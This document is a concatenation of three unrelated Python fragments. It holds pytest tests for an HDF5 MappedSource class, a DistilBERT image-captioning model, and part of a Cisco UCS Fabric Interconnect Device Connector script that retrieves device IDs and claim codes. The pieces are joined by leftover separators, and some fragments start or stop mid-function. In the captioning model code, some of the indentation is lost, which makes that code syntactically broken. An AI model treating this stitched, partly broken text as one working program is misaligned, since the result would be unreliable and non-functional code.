    assert map_source.binary_channel_mask.sum() == shape[0], 'Wrong number of active channels'
    for field in aux_arrays:
        assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
        assert getattr(map_source, field).shape[1] == shape[1], 'aligned field {} wrong length'.format(field)
    # repeat for transpose: now sources are stacked on axis=0, but the resulting shape is transposed per vector
    # timeseries convention (channels X samples)
    shape = (single_shape[0] * 3, single_shape[1])
    map_source = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays, transpose=True)
    assert map_source.shape == shape[::-1], 'Shape wrong in transpose'
    assert map_source.binary_channel_mask.sum() == shape[1], 'Wrong number of active channels in transpose'
    for field in aux_arrays:
        assert hasattr(map_source, field), 'Aux field {} not preserved'.format(field)
        assert getattr(map_source, field).shape[0] == shape[0], 'aligned field {} wrong length'.format(field)
def test_joining():
    """Joining two mapped sources concatenates along time, in either order."""
    aux_arrays = ('test1', 'test2')
    files = [_create_hdf5(aux_arrays=aux_arrays) for _ in range(3)]
    map_source1 = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays)
    map_source2 = MappedSource.from_hdf_sources(_create_hdf5(aux_arrays=aux_arrays), 'data', aligned_arrays=aux_arrays)
    expected_shape = (len(map_source1), map_source1.shape[1] + map_source2.shape[1])
    assert map_source1.join(map_source2).shape == expected_shape, 'binder to buffer appending failed'
    assert map_source2.join(map_source1).shape == expected_shape, 'buffer to binder appending failed'
def test_joiningT():
    """Joining transposed mapped sources also concatenates along time, in either order."""
    aux_arrays = ('test1', 'test2')
    files = [_create_hdf5(aux_arrays=aux_arrays) for _ in range(3)]
    map_source1 = MappedSource.from_hdf_sources(files, 'data', aligned_arrays=aux_arrays, transpose=True)
    map_source2 = MappedSource.from_hdf_sources(
        _create_hdf5(aux_arrays=aux_arrays), 'data', aligned_arrays=aux_arrays, transpose=True,
    )
    expected_shape = (len(map_source1), map_source1.shape[1] + map_source2.shape[1])
    assert map_source1.join(map_source2).shape == expected_shape, 'binder to buffer appending failed'
    assert map_source2.join(map_source1).shape == expected_shape, 'buffer to binder appending failed'
def test_direct_mapped():
    """A source with no channel subset is a direct map; a subset breaks direct mapping."""
    f = _create_hdf5()
    assert MappedSource.from_hdf_sources(f, 'data').is_direct_map, 'direct map should be true'
    subset_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=range(4))
    assert not subset_source.is_direct_map, 'direct map should be false'
    # for transposed disk arrays
    f = _create_hdf5(transpose=True)
    assert MappedSource.from_hdf_sources(f, 'data', transpose=True).is_direct_map, 'direct map should be true'
    subset_source = MappedSource.from_hdf_sources(f, 'data', transpose=True, electrode_channels=range(4))
    assert not subset_source.is_direct_map, 'direct map should be false'
def test_scaling():
    """units_scale applies a gain (scalar) or offset-then-gain (pair) to mapped reads."""
    f = _create_hdf5()
    float_data = f['data'][:, 500:1000].astype('d')
    map_source = MappedSource.from_hdf_sources(f, 'data', units_scale=2.0)
    # FIX: the original wrote `np.all(a == b).all()` -- calling .all() on the
    # scalar result of np.all() is redundant and obscures intent; one np.all suffices.
    assert np.all(map_source[:, 500:1000] == float_data * 2), 'scalar scaling wrong'
    map_source = MappedSource.from_hdf_sources(f, 'data', units_scale=(-100, 2.0))
    assert np.all(map_source[:, 500:1000] == (float_data - 100) * 2), 'affine scaling wrong'
def test_electrode_subset():
    """electrode_channels selects the corresponding row subset of the mapped data."""
    f = _create_hdf5()
    electrode_channels = [2, 4, 6, 8]
    map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
    expected = f['data'][:, :][electrode_channels]
    assert np.all(expected[:, 100:200] == map_source[:, 100:200]), 'electrode subset failed'
def test_electrode_subsetT():
    """electrode_channels selects columns of a transposed source (read back transposed)."""
    f = _create_hdf5(transpose=True)
    electrode_channels = [2, 4, 6, 8]
    map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels, transpose=True)
    expected = f['data'][:, :][:, electrode_channels].T
    assert np.all(expected[:, 100:200] == map_source[:, 100:200]), 'electrode subset failed in transpose'
def test_channel_map():
    """set_channel_mask hides masked channels; passing None restores all channels."""
    f = _create_hdf5()
    electrode_channels = list(range(10))
    binary_mask = np.ones(10, '?')
    binary_mask[:5] = False
    # so channels 5, 6, 7, 8, 9 should be active
    map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
    map_source.set_channel_mask(binary_mask)
    assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong'
    full_data = f['data'][:, :][electrode_channels, :]
    assert np.all(full_data[5:, 100:200] == map_source[:, 100:200]), 'channel masking failed'
    # unmask
    map_source.set_channel_mask(None)
    binary_mask[:] = True
    assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong'
    assert np.all(full_data[:, 100:200] == map_source[:, 100:200]), 'channel masking failed'
def test_channel_mapT():
    """Channel masking and unmasking behave the same for a transposed source."""
    f = _create_hdf5(transpose=True)
    electrode_channels = list(range(10))
    binary_mask = np.ones(10, '?')
    binary_mask[:5] = False
    # so channels 5, 6, 7, 8, 9 should be active
    map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels, transpose=True)
    map_source.set_channel_mask(binary_mask)
    assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong in transpose'
    full_data = f['data'][:, :][:, electrode_channels].T
    assert np.all(full_data[5:, 100:200] == map_source[:, 100:200]), 'channel masking failed in transpose'
    # unmask
    map_source.set_channel_mask(None)
    binary_mask[:] = True
    assert (map_source.binary_channel_mask == binary_mask).all(), 'binary mask wrong'
    assert np.all(full_data[:, 100:200] == map_source[:, 100:200]), 'channel masking failed'
def test_channel_slicing():
    """channels_are_maps(True) makes channel slices return sub-maps instead of arrays."""
    f = _create_hdf5()
    map_source = MappedSource.from_hdf_sources(
        f, 'data', electrode_channels=list(range(6, 17)), units_scale=5.0,
    )
    expected = map_source[:3, :]
    with map_source.channels_are_maps(True):
        sub_map = map_source[:3]
        assert isinstance(sub_map, MappedSource), 'slice did not return new map'
        assert np.array_equal(expected, sub_map[:, :]), 'new map data mis-mapped'
    as_array = map_source[:3]
    assert isinstance(as_array, np.ndarray), 'slice-as-array failed'
    assert np.array_equal(expected, as_array), 'slice-as-array wrong data'
def test_channel_slicingT():
    """Channel slicing semantics also hold for a transposed, scaled source."""
    f = _create_hdf5(transpose=True)
    map_source = MappedSource.from_hdf_sources(
        f, 'data', electrode_channels=list(range(6, 17)), transpose=True, units_scale=5.0,
    )
    expected = map_source[:3, :]
    with map_source.channels_are_maps(True):
        sub_map = map_source[:3]
        assert isinstance(sub_map, MappedSource), 'slice did not return new map'
        assert np.array_equal(expected, sub_map[:, :]), 'new map data mis-mapped'
    as_array = map_source[:3]
    assert isinstance(as_array, np.ndarray), 'slice-as-array failed'
    assert np.array_equal(expected, as_array), 'slice-as-array wrong data'
def test_channel_slicing_with_mask():
    """Channel slicing respects an active channel mask."""
    f = _create_hdf5()
    map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=list(range(6, 17)))
    mask = map_source.binary_channel_mask
    mask[:5] = False
    map_source.set_channel_mask(mask)
    expected = map_source[:3, :]
    with map_source.channels_are_maps(True):
        sub_map = map_source[:3]
        assert isinstance(sub_map, MappedSource), 'slice did not return new map'
        assert np.array_equal(expected, sub_map[:, :]), 'new map data mis-mapped'
    as_array = map_source[:3]
    assert isinstance(as_array, np.ndarray), 'slice-as-array failed'
    assert np.array_equal(expected, as_array), 'slice-as-array wrong data'
def test_big_slicing_exception():
    """Slicing more than the configured memory limit raises MemoryBlowOutError."""
    import ecogdata.expconfig.global_config as globalconfig
    f = _create_hdf5()
    data = f['data']
    # set the limit to half of the full array so a full slice must blow out
    globalconfig.OVERRIDE['memory_limit'] = data.size * data.dtype.itemsize / 2.0
    map_source = MappedSource.from_hdf_sources(f, 'data')
    # FIX: the original nested a no-op `except Exception as e: raise e` inside the
    # pytest.raises block and put the cleanup `finally` inside it too.  Wrapping the
    # raises-block in try/finally is equivalent on the failure path and additionally
    # restores the config override even if the expected error never fires.
    try:
        with pytest.raises(MemoryBlowOutError):
            map_source[:, :]
    finally:
        globalconfig.OVERRIDE.pop('memory_limit')
def test_big_slicing_allowed():
    """The big_slices(True) context suspends the memory-limit check."""
    import ecogdata.expconfig.global_config as globalconfig
    f = _create_hdf5()
    data = f['data']
    # limit below the full array size, so only the context makes the slice legal
    globalconfig.OVERRIDE['memory_limit'] = data.size * data.dtype.itemsize / 2.0
    map_source = MappedSource.from_hdf_sources(f, 'data')
    try:
        with map_source.big_slices(True):
            _ = map_source[:, :]
    except MemoryBlowOutError:
        # FIX: dropped the unused `as e` binding from the original (lint F841)
        assert False, 'Big slicing context failed'
    finally:
        globalconfig.OVERRIDE.pop('memory_limit')
def test_big_slicing_allowed_always():
    """raise_on_big_slice=False disables the memory-limit check permanently."""
    import ecogdata.expconfig.global_config as globalconfig
    f = _create_hdf5()
    data = f['data']
    # limit below the full array size, so only the constructor flag makes this legal
    globalconfig.OVERRIDE['memory_limit'] = data.size * data.dtype.itemsize / 2.0
    map_source = MappedSource.from_hdf_sources(f, 'data', raise_on_big_slice=False)
    try:
        _ = map_source[:, :]
    except MemoryBlowOutError:
        # FIX: dropped the unused `as e` binding from the original (lint F841)
        assert False, 'Big slicing context failed'
    finally:
        globalconfig.OVERRIDE.pop('memory_limit')
def test_write():
    """Writes through a channel-subset map read back correctly, masked or not."""
    f = _create_hdf5()
    electrode_channels = list(range(10))
    binary_mask = np.ones(10, '?')
    binary_mask[:5] = False
    # so channels 5, 6, 7, 8, 9 should be active
    map_source = MappedSource.from_hdf_sources(f, 'data', electrode_channels=electrode_channels)
    n_samples = map_source.shape[1]
    rand_pattern = np.random.randint(0, 100, size=(2, n_samples))
    map_source[:2] = rand_pattern
    # use full-slice syntax to get data
    assert np.array_equal(map_source[:2, :], rand_pattern), 'write failed (map subset)'
    map_source.set_channel_mask(binary_mask)
    # write again
    map_source[:2] = rand_pattern
    assert np.array_equal(map_source[:2, :], rand_pattern), 'write failed (map subset and mask)'
def test_write_to_binder():
    """Writes that span the boundary between bound files land correctly.

    NOTE(review): this function appears truncated at the end of the visible
    chunk -- the assertion after the masked re-write may be missing; verify
    against the original file.
    """
    files = [_create_hdf5() for i in range(3)]
    electrode_channels = list(range(10))
    binary_mask = np.ones(10, '?')
    binary_mask[:5] = False
    # so channels 5, 6, 7, 8, 9 should be active
    map_source = MappedSource.from_hdf_sources(files, 'data', electrode_channels=electrode_channels)
    # make a write that spans buffers
    single_length = files[0]['data'].shape[1]
    rand_pattern = np.random.randint(0, 100, size=(2, 205))
    # slice straddles the first file's end: 100 samples before, 105 after
    sl = np.s_[:2, single_length - 100: single_length + 105]
    map_source[sl] = rand_pattern
    # use full-slice syntax to get data
    assert np.array_equal(map_source[sl], rand_pattern), 'write failed to binder (map subset)'
    map_source.set_channel_mask(binary_mask)
    # write again
    map_source[sl] = rand_pattern
| |
<gh_stars>0
# Copyright (c) 2020 Microsoft Corporation. Licensed under the MIT license.
from __future__ import absolute_import, division, print_function, unicode_literals
import logging
import math
import torch
from torch import nn
import torch.nn.functional as F
from torch.nn import CrossEntropyLoss, MSELoss
from transformers.modeling_bert import (
BertPredictionHeadTransform)
from transformers.modeling_distilbert import (
Embeddings, TransformerBlock, Transformer,
DistilBertModel, FFN)
from transformers.modeling_utils import (
apply_chunking_to_forward,
find_pruneable_heads_and_indices,
prune_linear_layer,
)
from transformers.modeling_outputs import (
BaseModelOutput,
MaskedLMOutput,
MultipleChoiceModelOutput,
QuestionAnsweringModelOutput,
SequenceClassifierOutput,
TokenClassifierOutput,
)
from .modeling_utils import CaptionPreTrainedModel
from ..utils.cbs import ConstrainedBeamSearch, select_best_beam_with_constraints
import copy
logger = logging.getLogger(__name__)
class MultiHeadSelfAttention(nn.Module):
    """Multi-head self-attention adapted from DistilBERT's implementation.

    Deliberately diverges from the upstream transformers version in ``forward``:
    the attention mask is assumed to be pre-processed (expanded) by the caller,
    so no reshaping/expansion beyond ``expand_as`` is done here.
    """
    def __init__(self, config):
        """config must provide: n_heads, dim (hidden size), attention_dropout."""
        super().__init__()
        self.n_heads = config.n_heads
        self.dim = config.dim
        self.dropout = nn.Dropout(p=config.attention_dropout)
        # hidden size must split evenly across heads
        assert self.dim % self.n_heads == 0
        self.q_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
        self.k_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
        self.v_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
        self.out_lin = nn.Linear(in_features=config.dim, out_features=config.dim)
        # indices of heads removed so far (used by find_pruneable_heads_and_indices)
        self.pruned_heads = set()
    def prune_heads(self, heads):
        """Remove the given attention heads, shrinking q/k/v/out projections in place."""
        attention_head_size = self.dim // self.n_heads
        if len(heads) == 0:
            return
        heads, index = find_pruneable_heads_and_indices(heads, self.n_heads, attention_head_size, self.pruned_heads)
        # Prune linear layers
        self.q_lin = prune_linear_layer(self.q_lin, index)
        self.k_lin = prune_linear_layer(self.k_lin, index)
        self.v_lin = prune_linear_layer(self.v_lin, index)
        self.out_lin = prune_linear_layer(self.out_lin, index, dim=1)
        # Update hyper params
        self.n_heads = self.n_heads - len(heads)
        self.dim = attention_head_size * self.n_heads
        self.pruned_heads = self.pruned_heads.union(heads)
    def forward(self, query, key, value, mask, head_mask=None, output_attentions=False):
        """
        Parameters:
            query: torch.tensor(bs, seq_length, dim)
            key: torch.tensor(bs, seq_length, dim)
            value: torch.tensor(bs, seq_length, dim)
            mask: torch.tensor(bs, 1, seq_length, seq_length)
        Returns:
            weights: torch.tensor(bs, n_heads, seq_length, seq_length) Attention weights context: torch.tensor(bs,
            seq_length, dim) Contextualized layer. Optional: only if `output_attentions=True`
        """
        bs, q_length, dim = query.size()
        k_length = key.size(1)
        # assert dim == self.dim, 'Dimensions do not match: %s input vs %s configured' % (dim, self.dim)
        # assert key.size() == value.size()
        dim_per_head = self.dim // self.n_heads
        def shape(x):
            """ separate heads """
            return x.view(bs, -1, self.n_heads, dim_per_head).transpose(1, 2)
        def unshape(x):
            """ group heads """
            return x.transpose(1, 2).contiguous().view(bs, -1, self.n_heads * dim_per_head)
        q = shape(self.q_lin(query))  # (bs, n_heads, q_length, dim_per_head)
        k = shape(self.k_lin(key))  # (bs, n_heads, k_length, dim_per_head)
        v = shape(self.v_lin(value))  # (bs, n_heads, k_length, dim_per_head)
        q = q / math.sqrt(dim_per_head)  # (bs, n_heads, q_length, dim_per_head)
        scores = torch.matmul(q, k.transpose(2, 3))  # (bs, n_heads, q_length, k_length)
        # since the mask has been processed externally, the following step of expanding the mask is omitted
        # positions where the incoming mask is 0 are blocked with -inf before softmax
        mask = (mask == 0).expand_as(scores)  # (bs, n_heads, q_length, k_length)
        # NOTE(review): a query row with *all* keys masked would softmax over all
        # -inf and yield NaNs -- callers must guarantee at least one unmasked key.
        scores.masked_fill_(mask, -float("inf"))  # (bs, n_heads, q_length, k_length)
        weights = nn.Softmax(dim=-1)(scores)  # (bs, n_heads, q_length, k_length)
        weights = self.dropout(weights)  # (bs, n_heads, q_length, k_length)
        # Mask heads if we want to
        if head_mask is not None:
            weights = weights * head_mask
        context = torch.matmul(weights, v)  # (bs, n_heads, q_length, dim_per_head)
        context = unshape(context)  # (bs, q_length, dim)
        context = self.out_lin(context)  # (bs, q_length, dim)
        if output_attentions:
            return (context, weights)
        else:
            return (context,)
class CaptionTransformerBlock(TransformerBlock):
    """
    Modified from TransformerBlock to add support for output_hidden_states
    and cached encoder history states (for step-wise caption decoding).
    """

    def __init__(self, config):
        """Build self-attention + layer norm and FFN + layer norm sub-layers."""
        super().__init__(config)
        # The model width must split evenly across attention heads.
        assert config.dim % config.n_heads == 0
        self.attention = MultiHeadSelfAttention(config)
        self.sa_layer_norm = nn.LayerNorm(normalized_shape=config.dim, eps=1e-12)
        self.ffn = FFN(config)
        self.output_layer_norm = nn.LayerNorm(normalized_shape=config.dim, eps=1e-12)

    def forward(self, x, attn_mask=None, head_mask=None, output_attentions=False, history_state=None):
        """
        Parameters:
            x: torch.tensor(bs, seq_length, dim)
            attn_mask: torch.tensor(bs, seq_length)
            history_state: torch.tensor(bs, history_length, dim) or None
        Returns:
            ffn_output: torch.tensor(bs, seq_length, dim) — the transformer
            block output; preceded by sa_weights
            torch.tensor(bs, n_heads, seq_length, seq_length) when
            `output_attentions=True`.
        """
        # Self-Attention. With cached history, keys/values cover the full
        # sequence seen so far while queries cover only the new positions.
        if history_state is not None:
            x_states = torch.cat([history_state, x], dim=1)
        else:
            x_states = x
        sa_output = self.attention(
            query=x,
            key=x_states,
            value=x_states,
            mask=attn_mask,
            head_mask=head_mask,
            output_attentions=output_attentions,
        )
        if output_attentions:
            sa_output, sa_weights = sa_output  # (bs, seq_length, dim), (bs, n_heads, seq_length, seq_length)
        else:
            # The attention module returns a 1-tuple when weights are not requested.
            # Fixed: use isinstance() instead of `type(...) == tuple`.
            assert isinstance(sa_output, tuple)
            sa_output = sa_output[0]
        sa_output = self.sa_layer_norm(sa_output + x)  # residual + norm, (bs, seq_length, dim)
        # Feed Forward Network
        ffn_output = self.ffn(sa_output)  # (bs, seq_length, dim)
        ffn_output = self.output_layer_norm(ffn_output + sa_output)  # residual + norm
        output = (ffn_output,)
        if output_attentions:
            output = (sa_weights,) + output
        return output
class CaptionTransformer(Transformer):
    """
    Modified from Transformer to add support for output_hidden_states.
    """

    def __init__(self, config):
        """Stack ``config.n_layers`` deep copies of one CaptionTransformerBlock."""
        super().__init__(config)
        self.n_layers = config.n_layers
        template = CaptionTransformerBlock(config)
        self.layer = nn.ModuleList([copy.deepcopy(template) for _ in range(config.n_layers)])

    def forward(
        self, x, attn_mask=None, head_mask=None, output_attentions=False, output_hidden_states=False,
        return_dict=None, encoder_history_states=None
    ):  # docstyle-ignore
        """Run the input through every layer, optionally collecting the
        per-layer hidden states and attention weights.

        Parameters:
            x: torch.tensor(bs, seq_length, dim) — embedded input sequence.
            attn_mask: torch.tensor(bs, seq_length) — attention mask.
        Returns:
            Tuple of (last hidden state [, all hidden states] [, all
            attentions]) when return_dict is falsy, else a BaseModelOutput.
        """
        collected_states = () if output_hidden_states else None
        collected_attns = () if output_attentions else None
        hidden = x
        for idx, block in enumerate(self.layer):
            if output_hidden_states:
                collected_states = collected_states + (hidden,)
            # Per-layer cached history states, if decoding with a cache.
            past = None if encoder_history_states is None else encoder_history_states[idx]
            outputs = block(
                x=hidden, attn_mask=attn_mask, head_mask=head_mask[idx],
                output_attentions=output_attentions, history_state=past
            )
            hidden = outputs[-1]
            if output_attentions:
                assert len(outputs) == 2
                collected_attns = collected_attns + (outputs[0],)
            else:
                assert len(outputs) == 1
        # Add last layer
        if output_hidden_states:
            collected_states = collected_states + (hidden,)
        if not return_dict:
            return tuple(v for v in [hidden, collected_states, collected_attns] if v is not None)
        return BaseModelOutput(
            last_hidden_state=hidden, hidden_states=collected_states, attentions=collected_attns
        )
class DistilBertImgModel(DistilBertModel):
""" Expand from BertModel to handle image region features as input
"""
def __init__(self, config):
super(DistilBertImgModel, self).__init__(config)
self.embeddings = Embeddings(config)
self.encoder = CaptionTransformer(config)
del self.transformer
self.img_dim = config.img_feature_dim
logger.info('BertImgModel Image Dimension: {}'.format(self.img_dim))
self.img_feature_type = config.img_feature_type
if hasattr(config, 'use_img_layernorm'):
self.use_img_layernorm = config.use_img_layernorm
else:
self.use_img_layernorm = None
if config.img_feature_type == 'dis_code':
self.code_embeddings = nn.Embedding(config.code_voc, config.code_dim, padding_idx=0)
self.img_embedding = nn.Linear(config.code_dim, self.config.hidden_size, bias=True)
elif config.img_feature_type == 'dis_code_t': # transpose
self.code_embeddings = nn.Embedding(config.code_voc, config.code_dim, padding_idx=0)
self.img_embedding = nn.Linear(config.code_size, self.config.hidden_size, bias=True)
elif config.img_feature_type == 'dis_code_scale': # scaled
self.input_embeddings = nn.Linear(config.code_dim, config.code_size, bias=True)
self.code_embeddings = nn.Embedding(config.code_voc, config.code_dim, padding_idx=0)
self.img_embedding = nn.Linear(config.code_dim, self.config.hidden_size, bias=True)
else:
self.img_embedding = nn.Linear(self.img_dim, self.config.hidden_size, bias=True)
self.dropout = nn.Dropout(config.hidden_dropout_prob)
if self.use_img_layernorm:
self.LayerNorm = nn.LayerNorm(config.hidden_size, eps=config.img_layer_norm_eps)
self.init_weights()
    def get_input_embeddings(self):
        """Return the token (word) embedding layer used for input ids."""
        return self.embeddings.word_embeddings
    def set_input_embeddings(self, new_embeddings):
        """Replace the token (word) embedding layer with ``new_embeddings``."""
        self.embeddings.word_embeddings = new_embeddings
def _prune_heads(self, heads_to_prune):
""" Prunes heads of the model.
heads_to_prune: dict of {layer_num: list of heads to prune in this layer}
See base class PreTrainedModel
"""
for layer, heads in heads_to_prune.items():
self.encoder.layer[layer].attention.prune_heads(heads)
def forward(self, input_ids, attention_mask=None, head_mask=None, img_feats=None,
encoder_history_states=None, output_attentions=None, output_hidden_states=None, return_dict=None):
output_attentions = output_attentions if output_attentions is not None else self.config.output_attentions
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
if attention_mask is None:
attention_mask = torch.ones_like(input_ids)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
if attention_mask.dim() == 2:
extended_attention_mask = attention_mask.unsqueeze(1).unsqueeze(2)
elif attention_mask.dim() == 3:
extended_attention_mask = attention_mask.unsqueeze(1)
else:
raise NotImplementedError
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = extended_attention_mask.to(dtype=next(self.parameters()).dtype) # fp16 compatibility
extended_attention_mask = (1.0 - extended_attention_mask) * -10000.0
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if head_mask is not None:
if head_mask.dim() == 1:
head_mask = head_mask.unsqueeze(0).unsqueeze(0).unsqueeze(-1).unsqueeze(-1)
head_mask = head_mask.expand(self.config.num_hidden_layers, -1, -1, -1, -1)
elif head_mask.dim() == 2:
head_mask = head_mask.unsqueeze(1).unsqueeze(-1).unsqueeze(-1) # We can specify head_mask for each layer
# switch to float if needed + fp16 compatibility
head_mask = head_mask.to(dtype=next(self.parameters()).dtype) # switch to fload if need + fp16 compatibility
else:
head_mask = [None] * self.config.num_hidden_layers
embedding_output = self.embeddings(input_ids) # DistilBERT uses self-genearted position_embedding and
# no | |
Obtain Device ID
print("Attempting to obtain the UCS FI Device Connector Device "
"ID...")
get_ucs_fi_device_connector_device_id = _request_ucs_fi_device_connector_device_id(
ucs_fi_device_console_ip,
ucs_fi_device_console_login
)
if get_ucs_fi_device_connector_device_id.status_code == 200:
ucs_fi_device_connector_device_id_list = get_ucs_fi_device_connector_device_id.json()
ucs_fi_device_connector_device_id = ucs_fi_device_connector_device_id_list[0]["Id"]
print("The Device ID for the Device Connector of "
f"{ucs_fi_device_console_ip} has been retrieved.")
return ucs_fi_device_connector_device_id
else:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Device ID for the Device "
f"Connector of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(get_ucs_fi_device_connector_device_id.json())
else:
print("\nA configuration error has occurred!\n")
print("Unable to login to the UCS FI Device Console for "
f"{ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
print(ucs_fi_device_console_login.json())
except Exception:
print("\nA configuration error has occurred!\n")
print("Unable to obtain the Device ID for the Device Connector "
f"of {ucs_fi_device_console_ip}.\n")
print("Exception Message: ")
traceback.print_exc()
# Establish function to obtain UCS IMM FI Device Connector Claim Code
def obtain_ucs_fi_device_connector_claim_code(
        ucs_fi_device_console_ip,
        ucs_fi_device_console_username,
        ucs_fi_device_console_password
        ):
    """This is a function to obtain the Device Connector Claim Code for an
    unclaimed UCS Fabric Interconnect under Intersight Managed Mode (IMM).
    If the first retrieval fails, the Device Connector is refreshed and one
    more retrieval attempt is made.
    Args:
        ucs_fi_device_console_ip (str):
            The IP address of a UCS Fabric Interconnect under Intersight
            Managed Mode (IMM).
        ucs_fi_device_console_username (str):
            The admin username of a UCS Fabric Interconnect under Intersight
            Managed Mode (IMM).
        ucs_fi_device_console_password (str):
            The admin password of a UCS Fabric Interconnect under Intersight
            Managed Mode (IMM).
    Returns:
        A string of the Device Connector Claim Code for an unclaimed UCS Fabric
        Interconnect. None is returned (implicitly) if the claim code could
        not be retrieved; error details are printed.
    Raises:
        Exception:
            An exception occurred due to an issue with accessing the provided
            UCS Fabric Interconnect.
    """
    try:
        # Login to UCS FI Device Console
        print("\nAttempting login to the UCS FI Device Console for "
              f"{ucs_fi_device_console_ip}...")
        ucs_fi_device_console_login = _request_ucs_fi_device_console_login(
            ucs_fi_device_console_ip,
            ucs_fi_device_console_username,
            ucs_fi_device_console_password
            )
        if ucs_fi_device_console_login.status_code == 200:
            print("Login to the UCS FI Device Console for "
                  f"{ucs_fi_device_console_ip} was successful.\n")
            # Obtain Claim Code
            print("Attempting to obtain the UCS FI Device Connector Claim "
                  "Code...")
            get_ucs_fi_device_connector_claim_code = _request_ucs_fi_device_connector_claim_code(
                ucs_fi_device_console_ip,
                ucs_fi_device_console_login
                )
            if get_ucs_fi_device_connector_claim_code.status_code == 200:
                # The API returns a list of objects; the claim code is the
                # "Token" field of the first entry.
                ucs_fi_device_connector_claim_code_list = get_ucs_fi_device_connector_claim_code.json()
                ucs_fi_device_connector_claim_code = ucs_fi_device_connector_claim_code_list[0]["Token"]
                print("The Claim Code for the Device Connector of "
                      f"{ucs_fi_device_console_ip} has been retrieved.")
                return ucs_fi_device_connector_claim_code
            else:
                print("\nA configuration error has occurred!\n")
                print("Unable to obtain the Claim Code for the Device "
                      f"Connector of {ucs_fi_device_console_ip}.\n")
                print("Exception Message: ")
                print(get_ucs_fi_device_connector_claim_code.json())
                print("A second attempt will be made to obtain Claim "
                      "Code by refreshing the Device Connector...")
                print("Refreshing the Device Connector...")
                # Refresh the Device Connector
                print("Attempting to refresh the UCS FI Device Connector...")
                device_connector_refresh = _request_ucs_fi_device_connector_refresh(
                    ucs_fi_device_console_ip,
                    ucs_fi_device_console_login
                    )
                # Pause to allow Device Connector refresh
                time.sleep(5)
                if device_connector_refresh.status_code == 200:
                    # Obtain Claim Code (second and final attempt)
                    print("Attempting to obtain the UCS FI Device Connector "
                          "Claim Code...")
                    get_ucs_fi_device_connector_claim_code_second_attempt = _request_ucs_fi_device_connector_claim_code(
                        ucs_fi_device_console_ip,
                        ucs_fi_device_console_login
                        )
                    if get_ucs_fi_device_connector_claim_code_second_attempt.status_code == 200:
                        ucs_fi_device_connector_claim_code_list = get_ucs_fi_device_connector_claim_code_second_attempt.json()
                        ucs_fi_device_connector_claim_code = ucs_fi_device_connector_claim_code_list[0]["Token"]
                        print("The Claim Code for the Device Connector of "
                              f"{ucs_fi_device_console_ip} has been "
                              "retrieved.")
                        return ucs_fi_device_connector_claim_code
                    else:
                        print("\nA configuration error has occurred!\n")
                        print("Unable to obtain the Claim Code for the "
                              "Device Connector of "
                              f"{ucs_fi_device_console_ip}.\n")
                        print("Exception Message: ")
                        print(get_ucs_fi_device_connector_claim_code_second_attempt.json())
                else:
                    print("\nA configuration error has occurred!\n")
                    print("Unable to refresh the Device Connector for "
                          f"{ucs_fi_device_console_ip}.\n")
                    print("Exception Message: ")
                    print(device_connector_refresh.json())
        else:
            print("\nA configuration error has occurred!\n")
            print("Unable to login to the UCS FI Device Console for "
                  f"{ucs_fi_device_console_ip}.\n")
            print("Exception Message: ")
            print(ucs_fi_device_console_login.json())
    except Exception:
        print("\nA configuration error has occurred!\n")
        print("Unable to obtain the Claim Code for the Device "
              f"Connector of {ucs_fi_device_console_ip}.\n")
        print("Exception Message: ")
        traceback.print_exc()
# Establish function to obtain UCS IMM FI Device Connector system information
def obtain_ucs_fi_device_connector_system_info(
        ucs_fi_device_console_ip,
        ucs_fi_device_console_username,
        ucs_fi_device_console_password
        ):
    """This is a function to obtain the Device Connector system information for
    a UCS Fabric Interconnect under Intersight Managed Mode (IMM).
    Args:
        ucs_fi_device_console_ip (str):
            The IP address of a UCS Fabric Interconnect under Intersight
            Managed Mode (IMM).
        ucs_fi_device_console_username (str):
            The admin username of a UCS Fabric Interconnect under Intersight
            Managed Mode (IMM).
        ucs_fi_device_console_password (str):
            The admin password of a UCS Fabric Interconnect under Intersight
            Managed Mode (IMM).
    Returns:
        A list of the Device Connector system information for the UCS Fabric
        Interconnect. None is returned (implicitly) if the system information
        could not be retrieved; error details are printed.
    Raises:
        Exception:
            An exception occurred due to an issue with accessing the provided
            UCS Fabric Interconnect.
    """
    try:
        # Login to UCS FI Device Console
        print("\nAttempting login to the UCS FI Device Console for "
              f"{ucs_fi_device_console_ip}...")
        ucs_fi_device_console_login = _request_ucs_fi_device_console_login(
            ucs_fi_device_console_ip,
            ucs_fi_device_console_username,
            ucs_fi_device_console_password
            )
        if ucs_fi_device_console_login.status_code == 200:
            print("Login to the UCS FI Device Console for "
                  f"{ucs_fi_device_console_ip} was successful.\n")
            # Obtain system information
            print("Attempting to obtain the UCS FI Device Connector system "
                  "information...")
            get_ucs_fi_device_connector_system_info = _request_ucs_fi_device_connector_system_info(
